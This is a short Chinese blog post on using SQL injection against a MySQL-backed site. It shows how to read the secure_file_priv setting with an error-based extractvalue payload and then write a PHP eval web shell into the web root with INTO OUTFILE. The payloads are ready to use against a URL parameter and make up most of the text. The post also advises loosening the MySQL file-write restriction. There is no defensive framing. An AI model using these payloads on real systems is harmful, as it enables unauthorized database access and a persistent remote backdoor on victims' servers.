查看mysql是否有文件读写权限,sql注入查询secure_file_priv权限

2022-01-29 06:43:15

show VARIABLES like %secure%

sql注入中的使用方法

查询secure_file_priv权限
?id=43 ) and extractvalue(1, concat(0x7e, (select @@global.secure_file_priv),0x7e)) --+(

写shell
?id=43 ) and extractvalue(1, concat(0x7e, (select<?php @eval($_POST[‘pass‘]);?>INTO OUTFILE “D:\wwwroot\xxx.com\Runtime\2.php”),0x7e)) --+(

 

查看mysql是否有文件读写权限,sql注入查询secure_file_priv权限

 

 如果不显示需要配置my.ini

添加secure_file_priv=""

查看mysql是否有文件读写权限,sql注入查询secure_file_priv权限

 

查看mysql是否有文件读写权限,sql注入查询secure_file_priv权限

上一篇:【Mysql】数据库事务,脏读、幻读、不可重复读


下一篇:mysql无法使用子查询更新语句的解决方案_使用join语句更新或者临时变量